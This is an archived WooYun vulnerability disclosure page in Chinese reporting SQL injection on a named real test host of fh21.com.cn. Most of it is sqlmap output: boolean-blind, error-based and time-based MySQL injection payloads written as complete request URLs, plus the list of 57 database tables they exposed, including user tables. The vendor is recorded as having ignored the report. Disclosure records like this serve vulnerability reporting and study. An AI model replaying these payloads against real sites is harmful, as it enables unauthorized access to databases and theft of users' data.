乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-27: 厂商已经主动忽略漏洞,细节向公众公开
http://test.fh21.com.cn/index.php?a=countNum&aa=1&c=index&m=zzzc
sqlmap resumed the following injection point(s) from stored session:---Parameter: aa (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: a=countNum&aa=(SELECT (CASE WHEN (3463=3463) THEN 3463 ELSE 3463*(SELECT 3463 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&c=index&m=zzzc Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: a=countNum&aa=1 AND (SELECT 7449 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (ELT(7449=7449,1))),0x716b7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&c=index&m=zzzc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: a=countNum&aa=1 AND (SELECT * FROM (SELECT(SLEEP(5)))eYTM)&c=index&m=zzzc---back-end DBMS: MySQL 5.0Database: fh21_test[57 tables]+---------------------------+| user || breakfast || breakfast_info || food || food_list || food_type || lunch || lunch_info || supper || supper_info || tools_cdjk_body || tools_cdjk_category || tools_cdjk_disease || tools_cdjk_food || tools_food_list || tools_food_type || tools_hyzj_maincate || tools_hyzj_question || tools_hyzj_res || tools_hyzj_subcate || tools_hyzj_topic || tools_jkzc_category || tools_jkzc_question || tools_jkzc_symptom || tools_pingce_answers || tools_pingce_question || tools_pingce_result || tools_pingce_topic || tools_scbd_class || tools_scbd_cookbook || tools_scbd_dapei || tools_scbd_food || tools_scbd_food_nutrition || tools_scbd_nutrition || tools_scbd_tag || tools_scbd_tag_index || tools_sex_answers || tools_sex_question || tools_sex_result || tools_sex_topic || tools_static_topic || tools_xbzjz_body || tools_xbzjz_category || tools_xbzjz_disease || tools_xbzjz_res || tools_zhengzhuang || tools_zice || tools_zzjcq_category || tools_zzjcq_clue || tools_zzjcq_question || tools_zzjcq_symptom || tools_zzzc_answer || tools_zzzc_question || tools_zzzc_topic || user_food || user_info || user_sport |+---------------------------+
危害等级:无影响厂商忽略
忽略时间:2015-12-27 16:44
漏洞Rank:4 (WooYun评价)
暂无